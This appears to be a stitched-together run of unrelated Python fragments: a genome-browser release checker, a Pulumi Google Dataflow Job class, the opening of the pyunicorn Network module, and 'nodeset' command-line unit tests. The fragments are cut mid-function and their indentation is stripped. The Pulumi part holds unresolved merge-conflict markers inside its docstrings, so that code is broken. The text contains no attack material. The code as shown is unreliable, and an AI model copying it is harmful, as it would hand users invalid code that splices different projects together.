sys.stderr.write("Scanning and parsing release directories\n")
#check if all files listed in release directories have associated metaDb entries
(self.newMdb, self.revokedSet, self.revokedFiles, self.atticSet, self.newSupplementalSet, newFileErrors) = self.checkMetaDbForFiles("alpha metaDb", "new")
(self.oldMdb, self.oldRevokedSet, self.oldRevokedFiles, self.oldAtticSet, self.oldSupplementalSet, oldFileErrors) = self.checkMetaDbForFiles("public metaDb", "old")
self.expIds = set(self.newMdb.filter(lambda s: 'expId' in s, lambda s: s['expId']))
if self.verbose >= 2:
sys.stderr.write("Checking for attic files\n")
#check that attic fiels aren't in trackDb
if self.trackDb:
errors.extend(self.__checkAtticNotInTrackDb())
#checks to see that nothing has disappeared between public and alpha
if self.verbose >= 1:
sys.stderr.write("Checking new metaDb for missing stanzas\n")
errors.extend(self.__checkAlphaForDropped("alpha metaDb", "stanza"))
if self.verbose >=1:
sys.stderr.write("Checking file md5sums across releases\n")
errors.extend(self.__checkMd5sums())
#checks and gets tables that are present, also returns a revoked set of tables for new
if self.verbose >= 1:
sys.stderr.write("Checking table status\n")
(self.newTableSet, self.revokedTableSet, self.newMissingTables, newTableError) = self.checkTableStatus("alpha metaDb", "new")
(self.oldTableSet, spam, self.droppedTables, oldTableError) = self.checkTableStatus("public metaDb", "old")
self.newInAttic = self.atticSet - self.oldAtticSet
self.stillInAttic = self.oldAtticSet & self.atticSet
self.oldTableSet = self.oldTableSet - self.atticSet
self.noMoreAttic = self.oldAtticSet - self.atticSet
self.changedTables = self.oldTableSet - self.newTableSet - self.revokedTableSet
#same as above except for gbdbs
if self.verbose >= 1:
sys.stderr.write("Checking GBDB status\n")
(self.newGbdbSet, self.revokedGbdbs, newGbdbError) = self.getGbdbFiles("new")
(self.oldGbdbSet, eggs, oldGbdbError) = self.getGbdbFiles("old")
#remove missing files from gbdbs
self.oldGbdbSet = self.oldGbdbSet - self.missingFiles
self.oldGbdbSet = self.oldGbdbSet - self.atticSet
self.changedGbdbs = self.oldGbdbSet - self.newGbdbSet - self.revokedGbdbs
for i in self.missingFiles:
if i in self.oldReleaseFiles:
del self.oldReleaseFiles[i]
#fill in the errors
errors.extend(newFileErrors)
errors.extend(oldFileErrors)
errors.extend(newTableError)
errors.extend(oldTableError)
errors.extend(newGbdbError)
errors.extend(oldGbdbError)
if self.changedTables:
errors.append("These tables were tables in the old release, but are no longer tables in the new release:")
errors.extend(list(self.changedTables))
if self.changedGbdbs:
errors.append("These GBDBs were GBDB tables in the old release, but are no longer GBDB tables in the new release:")
errors.extend(list(self.changedGbdbs))
#for ease of typing
totalFiles = set(self.newReleaseFiles)
oldTotalFiles = set(self.oldReleaseFiles)
#these could honestly be moved earlier, get a file list processing section or something
#they clean out special fiels out and separated the master fiels list into the 3 required
#ones: wgEncode, supplemental and additional.
self.totalFiles = self.__cleanSpecialFiles(totalFiles)
self.oldTotalFiles = self.__cleanSpecialFiles(oldTotalFiles)
(self.oldTotalFiles, self.additionalList, self.oldAdditionalList, self.totalFiles) = self.__separateOutAdditional()
#get the stuff you need to push
self.pushTables = set(sorted((self.newTableSet - self.oldTableSet)))
self.pushFiles = set(sorted((self.totalFiles - self.oldTotalFiles)))
self.pushGbdbs = set(sorted((self.newGbdbSet - self.oldGbdbSet)))
self.newSupp = self.newSupplementalSet - self.oldSupplementalSet
self.newTables = set(self.pushTables)
self.newFiles = set(ucscUtils.printIter(self.pushFiles, self.releasePath))
self.newGbdbs = set(ucscUtils.printIter(self.pushGbdbs, self.gbdbPath))
self.newSupplemental = set(ucscUtils.printIter(self.newSupp, self.releasePath))
self.newOthers = set(ucscUtils.printIter(self.additionalList, self.releasePath))
self.fullFiles = sorted(self.totalFiles - self.revokedFiles)
self.fullTables = self.oldTableSet & self.newTableSet
self.errors = errors
#don't output.append(report unless ignore option is on or no errors
#module mode doesn't generate output by default
if self.verbose >= 1:
sys.stderr.write("Creating report\n")
| |
If the [subnetwork is located in a Shared VPC network](https://cloud.google.com/dataflow/docs/guides/specifying-networks#shared), you must use the complete URL. For example `"googleapis.com/compute/v1/projects/PROJECT_ID/regions/REGION/subnetworks/SUBNET_NAME"`
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="transformNameMapping")
def transform_name_mapping(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Only applicable when updating a pipeline. Map of transform name prefixes of the job to be replaced with the corresponding name prefixes of the new job. This field is not used outside of update.
>>>>>>> v4.1.0
"""
return pulumi.get(self, "transform_name_mapping")
@transform_name_mapping.setter
def transform_name_mapping(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "transform_name_mapping", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone in which the created job should run. If it is not provided, the provider zone is used.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _JobState:
def __init__(__self__, *,
additional_experiments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_streaming_engine: Optional[pulumi.Input[bool]] = None,
ip_configuration: Optional[pulumi.Input[str]] = None,
job_id: Optional[pulumi.Input[str]] = None,
kms_key_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
machine_type: Optional[pulumi.Input[str]] = None,
max_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
on_delete: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
temp_gcs_location: Optional[pulumi.Input[str]] = None,
template_gcs_path: Optional[pulumi.Input[str]] = None,
transform_name_mapping: Optional[pulumi.Input[Mapping[str, Any]]] = None,
type: Optional[pulumi.Input[str]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Job resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_experiments: List of experiments that should be used by the job. An example value is `["enable_stackdriver_agent_metrics"]`.
:param pulumi.Input[bool] enable_streaming_engine: Enable/disable the use of [Streaming Engine](https://cloud.google.com/dataflow/docs/guides/deploying-a-pipeline#streaming-engine) for the job. Note that Streaming Engine is enabled by default for pipelines developed against the Beam SDK for Python v2.21.0 or later when using Python 3.
:param pulumi.Input[str] ip_configuration: The configuration for VM IPs. Options are `"WORKER_IP_PUBLIC"` or `"WORKER_IP_PRIVATE"`.
:param pulumi.Input[str] job_id: The unique ID of this job.
:param pulumi.Input[str] kms_key_name: The name for the Cloud KMS key for the job. Key format is: `projects/PROJECT_ID/locations/LOCATION/keyRings/KEY_RING/cryptoKeys/KEY`
:param pulumi.Input[Mapping[str, Any]] labels: User labels to be specified for the job. Keys and values should follow the restrictions
specified in the [labeling restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions) page.
**NOTE**: Google-provided Dataflow templates often provide default labels that begin with `goog-dataflow-provided`.
Unless explicitly set in config, these labels will be ignored to prevent diffs on re-apply.
<<<<<<< HEAD
:param pulumi.Input[str] machine_type: The machine type to use for the job.
:param pulumi.Input[int] max_workers: The number of workers permitted to work on the job. More workers may improve processing speed at additional cost.
:param pulumi.Input[str] name: A unique name for the resource, required by Dataflow.
:param pulumi.Input[str] network: The network to which VMs will be assigned. If it is not provided, "default" will be used.
:param pulumi.Input[str] on_delete: One of "drain" or "cancel". Specifies behavior of deletion during `pulumi destroy`. See above note.
:param pulumi.Input[Mapping[str, Any]] parameters: Key/Value pairs to be passed to the Dataflow job (as used in the template).
:param pulumi.Input[str] project: The project in which the resource belongs. If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created job should run.
:param pulumi.Input[str] service_account_email: The Service Account email used to create the job.
:param pulumi.Input[str] state: The current state of the resource, selected from the [JobState enum](https://cloud.google.com/dataflow/docs/reference/rest/v1b3/projects.jobs#Job.JobState)
:param pulumi.Input[str] subnetwork: The subnetwork to which VMs will be assigned. Should be of the form "regions/REGION/subnetworks/SUBNETWORK". If the [subnetwork is located in a Shared VPC network](https://cloud.google.com/dataflow/docs/guides/specifying-networks#shared), you must use the complete URL. For example `"googleapis.com/compute/v1/projects/PROJECT_ID/regions/REGION/subnetworks/SUBNET_NAME"`
:param pulumi.Input[str] temp_gcs_location: A writeable location on GCS for the Dataflow job to dump its temporary data.
:param pulumi.Input[str] template_gcs_path: The GCS path to the Dataflow job template.
:param pulumi.Input[Mapping[str, Any]] transform_name_mapping: Only applicable when updating a pipeline. Map of transform name prefixes of the job to be replaced with the corresponding name prefixes of the new job. This field is not used outside of update.
>>>>>>> v4.1.0
:param pulumi.Input[str] type: The type of this job, selected from the [JobType enum](https://cloud.google.com/dataflow/docs/reference/rest/v1b3/projects.jobs#Job.JobType)
:param pulumi.Input[str] zone: The zone in which the created job should run. If it is not provided, the provider zone is used.
"""
if additional_experiments is not None:
pulumi.set(__self__, "additional_experiments", additional_experiments)
if enable_streaming_engine is not None:
pulumi.set(__self__, "enable_streaming_engine", enable_streaming_engine)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if job_id is not None:
pulumi.set(__self__, "job_id", job_id)
if kms_key_name is not None:
pulumi.set(__self__, "kms_key_name", kms_key_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if machine_type is not None:
pulumi.set(__self__, "machine_type", machine_type)
if max_workers is not None:
pulumi.set(__self__, "max_workers", max_workers)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if on_delete is not None:
pulumi.set(__self__, "on_delete", on_delete)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
if service_account_email is not None:
pulumi.set(__self__, "service_account_email", service_account_email)
if state is not None:
pulumi.set(__self__, "state", state)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
if temp_gcs_location is not None:
pulumi.set(__self__, "temp_gcs_location", temp_gcs_location)
if template_gcs_path is not None:
pulumi.set(__self__, "template_gcs_path", template_gcs_path)
if transform_name_mapping is not None:
pulumi.set(__self__, "transform_name_mapping", transform_name_mapping)
if type is not None:
pulumi.set(__self__, "type", type)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="additionalExperiments")
def additional_experiments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of experiments that should be used by the job. An example value is `["enable_stackdriver_agent_metrics"]`.
"""
return pulumi.get(self, "additional_experiments")
@additional_experiments.setter
def additional_experiments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_experiments", value)
@property
@pulumi.getter(name="enableStreamingEngine")
def enable_streaming_engine(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/disable the use of [Streaming Engine](https://cloud.google.com/dataflow/docs/guides/deploying-a-pipeline#streaming-engine) for the job. Note that Streaming Engine is enabled by default for pipelines developed against the Beam SDK for Python v2.21.0 or later when using Python 3.
"""
return pulumi.get(self, "enable_streaming_engine")
@enable_streaming_engine.setter
def enable_streaming_engine(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_streaming_engine", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input[str]]:
"""
The configuration for VM IPs. Options are `"WORKER_IP_PUBLIC"` or `"WORKER_IP_PRIVATE"`.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter(name="jobId")
def job_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID of this job.
"""
return pulumi.get(self, "job_id")
@job_id.setter
def job_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_id", value)
@property
@pulumi.getter(name="kmsKeyName")
def kms_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name for the Cloud KMS key for the job. Key format is: `projects/PROJECT_ID/locations/LOCATION/keyRings/KEY_RING/cryptoKeys/KEY`
"""
return pulumi.get(self, "kms_key_name")
@kms_key_name.setter
def kms_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
User labels to be specified for the job. Keys and values should follow the restrictions
specified in the [labeling restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions) page.
**NOTE**: Google-provided Dataflow templates often provide default labels that begin with `goog-dataflow-provided`.
Unless explicitly set in config, these labels will be ignored to prevent diffs on re-apply.
<<<<<<< HEAD
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="machineType")
def machine_type(self) -> Optional[pulumi.Input[str]]:
"""
The machine type to use for the job.
"""
return pulumi.get(self, "machine_type")
@machine_type.setter
def machine_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "machine_type", value)
@property
@pulumi.getter(name="maxWorkers")
def max_workers(self) -> Optional[pulumi.Input[int]]:
"""
The number of workers permitted to work on the job. More workers may improve processing speed at additional cost.
"""
return pulumi.get(self, "max_workers")
@max_workers.setter
def max_workers(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_workers", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the resource, required by Dataflow.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
The network to which VMs will be assigned. If it is not provided, "default" will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="onDelete")
def on_delete(self) -> Optional[pulumi.Input[str]]:
"""
One of "drain" or "cancel". Specifies behavior of deletion during `pulumi destroy`. See above note.
"""
return pulumi.get(self, "on_delete")
@on_delete.setter
def on_delete(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "on_delete", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Key/Value pairs to be passed to the Dataflow job (as used | |
<gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of pyunicorn.
# Copyright (C) 2008--2017 <NAME> and pyunicorn authors
# URL: <http://www.pik-potsdam.de/members/donges/software>
# License: BSD (3-clause)
"""
Provides classes for analyzing spatially embedded complex networks, handling
multivariate data and generating time series surrogates.
"""
# general TODO:
# - find segfault problem in a.w. shortest path betweenness
# - rename aw... to nsi... (node splitting invariant)
# - implement "corrected" node splitting invariant measures named cnsi...
# (see paper)
# - implement Newman modularity and iterative division
# - treat type-related ambiguities more thoroughly
# (flatten(), list(...), astype(...) etc.)
#
# Import essential packages
#
import sys # performance testing
import time
from functools import wraps # helper function for decorators
import numpy as np # array object and fast numerics
from numpy import random
from scipy import linalg # solvers
from scipy.linalg import matfuncs
from scipy import sparse as sp # fast sparse matrices
from scipy.sparse.linalg import eigsh, inv, splu
import igraph # high performance graph theory tools
from ..utils import progressbar # easy progress bar handling
from .. import mpi # parallelized computations
from pyunicorn.core._ext.numerics import _local_cliquishness_4thorder, \
_local_cliquishness_5thorder, _cy_mpi_nsi_newman_betweenness, \
_cy_mpi_newman_betweenness, _nsi_betweenness, _higher_order_transitivity4,\
_newman_betweenness_badly_cython, _do_nsi_clustering_I, \
_do_nsi_clustering_II, _do_nsi_hamming_clustering
def nz_coords(matrix):
"""
Find coordinates of all non-zero entries in a sparse matrix.
:return: list of coordinates [row,col]
:rtype: array([[int>=0,int>=0]])
"""
return np.array(matrix.nonzero()).T
def cache_helper(self, cat, key, msg, func, *args, **kwargs):
"""
Cache result of a function in a subdict of :attr:`self.cache`.
:arg str cat: cache category
:arg str key: cache key
:arg str msg: message to be displayed during first calculation
:arg func func: function to be cached
"""
# categories can be added on the fly?!?!
self.cache.setdefault(cat, {})
if self.cache[cat].setdefault(key) is None:
if msg is not None and self.silence_level <= 1:
print 'Calculating ' + msg + '...'
self.cache[cat][key] = func(self, *args, **kwargs)
return self.cache[cat][key]
def cached_const(cat, key, msg=None):
"""
Cache result of decorated method in a fixed subdict of :attr:`self.cache`.
"""
def wrapper(func):
@wraps(func)
def wrapped(self, *args, **kwargs):
return cache_helper(self, cat, key, msg, func, *args, **kwargs)
return wrapped
return wrapper
def cached_var(cat, msg=None):
"""
Cache result of decorated method in a variable subdict of
:attr:`self.cache`, specified as first argument to the decorated method.
"""
def wrapper(func):
@wraps(func)
def wrapped(self, key=None, **kwargs):
return cache_helper(self, cat, key, msg, func, key, **kwargs)
return wrapped
return wrapper
class NetworkError(Exception):
"""
Used for all exceptions raised by Network.
"""
def __init__(self, value):
Exception.__init__(self)
self.value = value
def __str__(self):
return repr(self.value)
#
# Define class Network
#
class Network(object):
"""
A Network is a simple, undirected or directed graph with optional node
and/or link weights. This class encapsulates data structures and methods to
represent, generate and analyze such structures.
Network relies on the package igraph for many of its features, but also
implements new functionality. Highlights include weighted and directed
statistical network measures, measures based on random walks, and
node splitting invariant network measures.
**Examples:**
Create an undirected network given the adjacency matrix:
>>> net = Network(adjacency=[[0,1,0,0,0,0], [1,0,1,0,0,1],
... [0,1,0,1,1,0], [0,0,1,0,1,0],
... [0,0,1,1,0,1], [0,1,0,0,1,0]])
Create an Erdos-Renyi random graph:
>>> net = Network.ErdosRenyi(n_nodes=100, link_probability=0.05)
Generating Erdos-Renyi random graph with 100 nodes and probability 0.05...
"""
#
# Definitions of internal methods
#
def __init__(self, adjacency=None, edge_list=None, directed=False,
node_weights=None, silence_level=0):
"""
Return a new directed or undirected Network object
with given adjacency matrix and optional node weights.
:type adjacency: square array-like [node,node], or pysparse matrix of
0s and 1s
:arg adjacency: Adjacency matrix of the new network. Entry [i,j]
indicates whether node i links to node j. Its diagonal must be
zero. Must be symmetric if directed=False.
:type edge_list: array-like list of lists
:arg edge_list: Edge list of the new network. Entries [i,0], [i,1]
contain the end-nodes of an edge.
:arg bool directed: Indicates whether the network shall be considered
as directed. If False, adjacency must be symmetric.
:type node_weights: 1d numpy array or list [node] of floats >= 0
:arg node_weights: Optional array or list of node weights to be used
for node splitting invariant network measures. Entry [i] is the
weight of node i. (Default: list of ones)
:type silence_level: int >= 0
:arg silence_level: The higher, the less progress info is output.
:rtype: :class:`Network` instance
:return: The new network.
"""
self.directed = directed
"""(bool) Indicates whether the network is directed."""
self.silence_level = silence_level
"""(int>=0) higher -> less progress info"""
self.N = 0
"""(int>0) number of nodes"""
self.n_links = 0
"""(int>0) number of links"""
self.link_density = 0
"""(0<float<1) proportion of linked node pairs"""
self.sp_A = None
"""(sparse.csc_matrix([[int,int]]) with entries 0,1)
Adjacency matrix. A[i,j]=1 indicates a link i -> j. Symmetric if the
network is undirected."""
self.sp_dtype = None
self.graph = None
"""(igraph.Graph) Embedded graph object providing some standard network
measures."""
self._node_weights = None
"""(array([int>=0])) array of node weights"""
self.mean_node_weight = 0
"""mean node weight"""
self.total_node_weight = 0
"""total node weight"""
self.cache = {'base': {}, 'nsi': {}, 'paths': {}}
"""(dict) cache of re-usable computation results"""
if adjacency is not None:
self._set_adjacency(adjacency)
elif edge_list is not None:
self.set_edge_list(edge_list)
else:
raise NetworkError("An adjacency matrix or edge list has to be " +
"given to initialize an instance of Network.")
self._set_node_weights(node_weights)
self.degree()
def __str__(self):
"""
Return a short summary of the network.
**Example:**
>>> print Network.SmallTestNetwork()
Network: undirected, 6 nodes, 7 links, link density 0.467.
:rtype: string
"""
return ('Network: %sdirected, %i nodes, %i links, ' +
'link density %.3f.') % ('' if self.directed else 'un', self.N,
self.n_links, self.link_density)
def __len__(self):
"""
Return the number of nodes as the 'length'.
**Example:**
>>> len(Network.SmallTestNetwork())
6
:rtype: int > 0
"""
return self.N
def clear_cache(self):
"""
Clear cache of information that can be recalculated from basic data.
"""
self.cache['base'] = {}
self.clear_nsi_cache()
self.clear_paths_cache()
def clear_nsi_cache(self):
"""
Clear cache of information that can be recalculated from basic data
and depends on the node weights.
"""
self.cache['nsi'] = {}
def clear_paths_cache(self):
"""
Clear cache of path legths for link attributes.
"""
for attr in self.cache['paths']:
self.clear_link_attribute(attr)
self.cache['paths'] = {}
def copy(self):
"""
Return a copy of the network.
"""
return Network(adjacency=self.sp_A, directed=self.directed,
node_weights=self.node_weights,
silence_level=self.silence_level)
def undirected_copy(self):
"""
Return an undirected copy of the network.
Nodes i and j are linked in the copy if, in the current network, i
links to j or j links to i or both.
**Example:**
>>> net = Network(adjacency=[[0,1],[0,0]], directed=True); print net
Network: directed, 2 nodes, 1 links, link density 0.500.
>>> print net.undirected_copy()
Network: undirected, 2 nodes, 1 links, link density 1.000.
:rtype: :class:`Network` instance
"""
return Network(adjacency=self.undirected_adjacency(),
directed=False, node_weights=self.node_weights,
silence_level=self.silence_level)
def permuted_copy(self, permutation):
"""
Return a copy of the network with node numbers rearranged. This
operation should not change topological information and network
measures.
:type permutation: array-like [int]
:arg permutation: desired permutation of nodes
:rtype: :class:`Network` instance
"""
idx = np.array(permutation)
if sorted(idx) != range(self.N):
raise NetworkError("Incorrect permutation indices!")
return Network(adjacency=self.sp_A[idx][:, idx],
node_weights=self.node_weights[idx],
directed=self.directed,
silence_level=self.silence_level)
def splitted_copy(self, node=-1, proportion=0.5):
"""
Return a copy of the network with one node splitted.
The specified node is split in two interlinked nodes
which are linked to the same nodes as the original node,
and the weight is splitted according to the given proportion.
(This method is useful for testing the node splitting invariance
of measures since a n.s.i. measure will be the same before and after
the split.)
**Example:**
>>> net = Network.SmallTestNetwork(); print net
Network: undirected, 6 nodes, 7 links, link density 0.467.
>>> net2 = net.splitted_copy(node=5, proportion=0.2); print net2
Network: undirected, 7 nodes, 9 links, link density 0.429.
>>> print net.node_weights; print net2.node_weights
[ 1.5 1.7 1.9 2.1 2.3 2.5]
[ 1.5 1.7 1.9 2.1 2.3 2. 0.5]
:type node: int
:arg node: The index of the node to be splitted. If negative,
N + index is used. The new node gets index N. (Default: -1)
:type proportion: float from 0 to 1
:arg proportion: The splitted node gets a new weight of
(1-proportion) * (weight of splitted node),
and the new node gets a weight of
proportion * (weight of splitted node).
(Default: 0.5)
:rtype: :class:`Network`
"""
N, A, w = self.N, | |
self._nodeset_t(["--fold", "-i", "bar[0-5]"], "foo[6-10]\n", "\n")
self._nodeset_t(["--fold", "-i", "foo[5-10,15]"], "foo[0-10]\nfoo[13-18]\n", "foo[5-10,15]\n")
# using stdin for -i
self._nodeset_t(["-f","foo[1-6]","-i","-"], "foo4 foo5 foo6\n", "foo[4-6]\n")
self._nodeset_t(["-f","-i","-","foo[1-6]"], "foo4 foo5 foo6\n", "foo[1-6]\n")
# numerical bracket folding (#228)
self._nodeset_t(["--fold", "-i", "node123[1-2]"], "node1232\n", "node1232\n")
self._nodeset_t(["--fold", "-i", "node023[1-2]0"], "node02320\n", "node02320\n")
self._nodeset_t(["--fold", "-i", "node023[1-2]0-ipmi2"], "node02320-ipmi2\n", "node02320-ipmi2\n")
def test_015_rangeset(self):
"""test nodeset --rangeset"""
self._nodeset_t(["--fold","--rangeset","1,2"], None, "1-2\n")
self._nodeset_t(["--expand","-R","1-2"], None, "1 2\n")
self._nodeset_t(["--fold","-R","1-2","-X","2-3"], None, "1,3\n")
def test_016_rangeset_stdin(self):
"""test nodeset --rangeset (stdin)"""
self._nodeset_t(["--fold","--rangeset"], "1,2\n", "1-2\n")
self._nodeset_t(["--expand","-R"], "1-2\n", "1 2\n")
self._nodeset_t(["--fold","-R","-X","2-3"], "1-2\n", "1,3\n")
def test_017_stdin(self):
"""test nodeset - (stdin)"""
self._nodeset_t(["-f","-"], "foo\n", "foo\n")
self._nodeset_t(["-f","-"], "foo1 foo2 foo3\n", "foo[1-3]\n")
self._nodeset_t(["--autostep=2", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=auto", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=100%", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
self._nodeset_t(["--autostep=0%", "-f"], "foo0 foo2 foo4 foo6\n", "foo[0-6/2]\n")
def test_018_split(self):
"""test nodeset --split"""
self._nodeset_t(["--split=2","-f", "bar"], None, "bar\n")
self._nodeset_t(["--split", "2","-f", "foo,bar"], None, "bar\nfoo\n")
self._nodeset_t(["--split", "2","-e", "foo", "bar", "bur", "oof", "gcc"], None, "bar bur foo\ngcc oof\n")
self._nodeset_t(["--split=2","-f", "foo[2-9]"], None, "foo[2-5]\nfoo[6-9]\n")
self._nodeset_t(["--split=2","-f", "foo[2-3,7]", "bar9"], None, "bar9,foo2\nfoo[3,7]\n")
self._nodeset_t(["--split=3","-f", "foo[2-9]"], None, "foo[2-4]\nfoo[5-7]\nfoo[8-9]\n")
self._nodeset_t(["--split=1","-f", "foo2", "foo3"], None, "foo[2-3]\n")
self._nodeset_t(["--split=4","-f", "foo[2-3]"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=4","-f", "foo3", "foo2"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=2","-e", "foo[2-9]"], None, "foo2 foo3 foo4 foo5\nfoo6 foo7 foo8 foo9\n")
self._nodeset_t(["--split=3","-e", "foo[2-9]"], None, "foo2 foo3 foo4\nfoo5 foo6 foo7\nfoo8 foo9\n")
self._nodeset_t(["--split=1","-e", "foo3", "foo2"], None, "foo2 foo3\n")
self._nodeset_t(["--split=4","-e", "foo[2-3]"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=4","-e", "foo2", "foo3"], None, "foo2\nfoo3\n")
self._nodeset_t(["--split=2","-c", "foo2", "foo3"], None, "1\n1\n")
def test_019_contiguous(self):
"""test nodeset --contiguous"""
self._nodeset_t(["--contiguous", "-f", "bar"], None, "bar\n")
self._nodeset_t(["--contiguous", "-f", "foo,bar"], None, "bar\nfoo\n")
self._nodeset_t(["--contiguous", "-f", "foo", "bar", "bur", "oof", "gcc"], None, "bar\nbur\nfoo\ngcc\noof\n")
self._nodeset_t(["--contiguous", "-e", "foo", "bar", "bur", "oof", "gcc"], None, "bar\nbur\nfoo\ngcc\noof\n")
self._nodeset_t(["--contiguous", "-f", "foo2"], None, "foo2\n")
self._nodeset_t(["--contiguous", "-R", "-f", "2"], None, "2\n")
self._nodeset_t(["--contiguous", "-f", "foo[2-9]"], None, "foo[2-9]\n")
self._nodeset_t(["--contiguous", "-f", "foo[2-3,7]", "bar9"], None, "bar9\nfoo[2-3]\nfoo7\n")
self._nodeset_t(["--contiguous", "-R", "-f", "2-3,7", "9"], None, "2-3\n7\n9\n")
self._nodeset_t(["--contiguous", "-f", "foo2", "foo3"], None, "foo[2-3]\n")
self._nodeset_t(["--contiguous", "-f", "foo3", "foo2"], None, "foo[2-3]\n")
self._nodeset_t(["--contiguous", "-f", "foo3", "foo1"], None, "foo1\nfoo3\n")
self._nodeset_t(["--contiguous", "-f", "foo[1-5/2]", "foo7"], None, "foo1\nfoo3\nfoo5\nfoo7\n")
def test_020_slice(self):
"""test nodeset -I/--slice"""
self._nodeset_t(["--slice=0","-f", "bar"], None, "bar\n")
self._nodeset_t(["--slice=0","-e", "bar"], None, "bar\n")
self._nodeset_t(["--slice=1","-f", "bar"], None, "\n")
self._nodeset_t(["--slice=0-1","-f", "bar"], None, "bar\n")
self._nodeset_t(["-I0","-f", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-R", "-I0","-f", "34-68,89-90"], None, "34\n")
self._nodeset_t(["-I 0","-f", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-I 0","-e", "bar[34-68,89-90]"], None, "bar34\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]"], None, "bar[34-37]\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]", "-x", "bar34"], None, "bar[35-38]\n")
self._nodeset_t(["-I 0-3","-f", "bar[34-68,89-90]", "-x", "bar35"], None, "bar[34,36-38]\n")
self._nodeset_t(["-I 0-3","-e", "bar[34-68,89-90]"], None, "bar34 bar35 bar36 bar37\n")
self._nodeset_t(["-I 3,1,0,2","-f", "bar[34-68,89-90]"], None, "bar[34-37]\n")
self._nodeset_t(["-I 1,3,7,10,16,20,30,34-35,37","-f", "bar[34-68,89-90]"], None, "bar[35,37,41,44,50,54,64,68,89]\n")
self._nodeset_t(["-I 8","-f", "bar[34-68,89-90]"], None, "bar42\n")
self._nodeset_t(["-I 8-100","-f", "bar[34-68,89-90]"], None, "bar[42-68,89-90]\n")
self._nodeset_t(["-I 0-100","-f", "bar[34-68,89-90]"], None, "bar[34-68,89-90]\n")
self._nodeset_t(["-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93%", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42-68/2,90]\n")
